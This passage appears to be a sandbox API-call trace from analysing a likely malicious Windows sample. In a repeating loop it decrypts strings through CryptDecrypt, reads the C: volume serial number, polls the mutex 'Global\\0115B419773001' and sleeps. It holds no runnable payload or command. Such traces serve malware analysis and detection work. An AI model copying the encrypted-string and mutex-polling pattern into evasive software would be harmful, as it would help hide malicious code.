pdwDataLen=0x2abf9ac) returned 1 [0039.098] CryptDestroyKey (hKey=0xe927f0) returned 1 [0039.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0039.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0039.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8068 [0039.098] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe927f0) returned 1 [0039.098] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0039.098] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8068, pdwDataLen=0x2abf984 | out: pbData=0x2af8068, pdwDataLen=0x2abf984) returned 1 [0039.098] CryptDestroyKey (hKey=0xe927f0) returned 1 [0039.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8068 | out: hHeap=0x2af0000) returned 1 [0039.098] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0039.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0039.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0039.098] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0039.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0039.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0039.098] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe927f0) returned 1 [0039.098] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0039.098] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0039.098] CryptDestroyKey (hKey=0xe927f0) returned 1 [0039.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0039.098] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c0 [0039.099] WaitForSingleObject (hHandle=0x2c0, dwMilliseconds=0x0) returned 0x102 [0039.099] CloseHandle (hObject=0x2c0) returned 1 [0039.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0039.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0039.099] Sleep (dwMilliseconds=0x3e8) [0040.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0040.788] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe92870) returned 1 [0040.788] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0040.788] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0040.788] CryptDestroyKey (hKey=0xe92870) returned 1 [0040.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0040.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0040.788] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8b18 [0040.788] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe927f0) returned 1 [0040.788] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0040.788] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8b18, pdwDataLen=0x2abf984 | out: pbData=0x2af8b18, pdwDataLen=0x2abf984) returned 1 [0040.788] CryptDestroyKey (hKey=0xe927f0) returned 1 [0040.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8b18 | out: hHeap=0x2af0000) returned 1 [0040.788] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0040.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0040.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0040.789] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0040.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0040.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0040.789] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe927f0) returned 1 [0040.789] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0040.789] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0040.789] CryptDestroyKey (hKey=0xe927f0) returned 1 [0040.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0040.789] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c0 [0040.789] WaitForSingleObject (hHandle=0x2c0, dwMilliseconds=0x0) returned 0x102 [0040.789] CloseHandle (hObject=0x2c0) returned 1 [0040.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0040.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0040.789] Sleep (dwMilliseconds=0x3e8) [0041.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0041.952] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe927f0) returned 1 [0041.952] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0041.952] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0041.952] CryptDestroyKey (hKey=0xe927f0) returned 1 [0041.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0041.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0041.952] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af7d70 [0041.952] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe92870) returned 1 [0041.952] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0041.952] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af7d70, pdwDataLen=0x2abf984 | out: pbData=0x2af7d70, pdwDataLen=0x2abf984) returned 1 [0041.952] CryptDestroyKey (hKey=0xe92870) returned 1 [0041.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af7d70 | out: hHeap=0x2af0000) returned 1 [0041.952] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0041.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0041.952] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0041.952] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0041.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0041.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0041.953] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe927f0) returned 1 [0041.953] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0041.953] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0041.953] CryptDestroyKey (hKey=0xe927f0) returned 1 [0041.953] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0041.953] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c0 [0041.953] WaitForSingleObject (hHandle=0x2c0, dwMilliseconds=0x0) returned 0x102 [0041.953] CloseHandle (hObject=0x2c0) returned 1 [0041.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0041.953] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0041.953] Sleep (dwMilliseconds=0x3e8) [0043.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0043.145] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe927f0) returned 1 [0043.145] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0043.145] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0043.145] CryptDestroyKey (hKey=0xe927f0) returned 1 [0043.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0043.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0043.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af89e8 [0043.145] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe927f0) returned 1 [0043.145] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0043.145] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af89e8, pdwDataLen=0x2abf984 | out: pbData=0x2af89e8, pdwDataLen=0x2abf984) returned 1 [0043.145] CryptDestroyKey (hKey=0xe927f0) returned 1 [0043.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af89e8 | out: hHeap=0x2af0000) returned 1 [0043.145] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0043.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0043.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0043.145] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0043.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0043.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0043.145] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe927f0) returned 1 [0043.145] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0043.145] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0043.145] CryptDestroyKey (hKey=0xe927f0) returned 1 [0043.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0043.145] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c0 [0043.146] WaitForSingleObject (hHandle=0x2c0, dwMilliseconds=0x0) returned 0x102 [0043.146] CloseHandle (hObject=0x2c0) returned 1 [0043.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0043.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0043.146] Sleep (dwMilliseconds=0x3e8) [0044.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0044.228] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe927f0) returned 1 [0044.228] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0044.228] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0044.228] CryptDestroyKey (hKey=0xe927f0) returned 1 [0044.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0044.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0044.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8360 [0044.228] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe927f0) returned 1 [0044.228] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0044.228] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8360, pdwDataLen=0x2abf984 | out: pbData=0x2af8360, pdwDataLen=0x2abf984) returned 1 [0044.228] CryptDestroyKey (hKey=0xe927f0) returned 1 [0044.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8360 | out: hHeap=0x2af0000) returned 1 [0044.228] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0044.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0044.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0044.228] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0044.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0044.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0044.229] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe927f0) returned 1 [0044.229] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0044.229] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0044.229] CryptDestroyKey (hKey=0xe927f0) returned 1 [0044.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0044.229] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c0 [0044.229] WaitForSingleObject (hHandle=0x2c0, dwMilliseconds=0x0) returned 0x102 [0044.229] CloseHandle (hObject=0x2c0) returned 1 [0044.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0044.229] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0044.229] Sleep (dwMilliseconds=0x3e8) [0045.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0045.622] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe927f0) returned 1 [0045.622] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0045.622] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0045.622] CryptDestroyKey (hKey=0xe927f0) returned 1 [0045.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0045.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0045.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8820 [0045.622] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe927f0) returned 1 [0045.622] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0045.622] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8820, pdwDataLen=0x2abf984 | out: pbData=0x2af8820, pdwDataLen=0x2abf984) returned 1 [0045.622] CryptDestroyKey (hKey=0xe927f0) returned 1 [0045.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8820 | out: hHeap=0x2af0000) returned 1 [0045.622] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0045.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0045.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0045.623] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0045.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0045.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0045.623] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe92870) returned 1 [0045.623] CryptSetKeyParam (hKey=0xe92870, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0045.623] CryptDecrypt (in: hKey=0xe92870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0045.623] CryptDestroyKey (hKey=0xe92870) returned 1 [0045.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0045.623] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c0 [0045.623] WaitForSingleObject (hHandle=0x2c0, dwMilliseconds=0x0) returned 0x102 [0045.623] CloseHandle (hObject=0x2c0) returned 1 [0045.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0045.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0045.623] Sleep (dwMilliseconds=0x3e8) [0046.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2af04c8 [0046.839] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf990, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9f8 | out: phKey=0x2abf9f8*=0xe927f0) returned 1 [0046.843] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9e0, dwFlags=0x0) returned 1 [0046.844] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af04c8, pdwDataLen=0x2abf9ac | out: pbData=0x2af04c8, pdwDataLen=0x2abf9ac) returned 1 [0046.845] CryptDestroyKey (hKey=0xe927f0) returned 1 [0046.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x1e) returned 0x2af1428 [0046.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2af1450 [0046.851] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2af8528 [0046.853] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf968, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abf9d0 | out: phKey=0x2abf9d0*=0xe927f0) returned 1 [0046.854] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abf9b8, dwFlags=0x0) returned 1 [0046.856] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af8528, pdwDataLen=0x2abf984 | out: pbData=0x2af8528, pdwDataLen=0x2abf984) returned 1 [0046.858] CryptDestroyKey (hKey=0xe927f0) returned 1 [0046.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af8528 | out: hHeap=0x2af0000) returned 1 [0046.860] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2af1428, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0046.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1450 | out: hHeap=0x2af0000) returned 1 [0046.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af04c8 | out: hHeap=0x2af0000) returned 1 [0046.870] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2abfa38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2abfa38*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0046.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2af1428 | out: hHeap=0x2af0000) returned 1 [0046.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2af1428 [0046.885] CryptImportKey (in: hProv=0xe843e0, pbData=0x2abf9c4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2abfa2c | out: phKey=0x2abfa2c*=0xe927f0) returned 1 [0046.887] CryptSetKeyParam (hKey=0xe927f0, dwParam=0x1, pbData=0x2abfa14, dwFlags=0x0) returned 1 [0046.894] CryptDecrypt (in: hKey=0xe927f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2af1428, pdwDataLen=0x2abf9e0 | out: pbData=0x2af1428, pdwDataLen=0x2abf9e0) returned 1 [0046.894] CryptDestroyKey (hKey=0xe927f0) returned 1 [0046.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x8, Size=0x34) returned 0x2af04c8 [0046.894] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x2c0 [0046.894] WaitForSingleObject (hHandle=0x2c0, dwMilliseconds=0x0) returned 0x102 [0046.894] CloseHandle (hObject=0x2c0) returned 1 [0046.894] 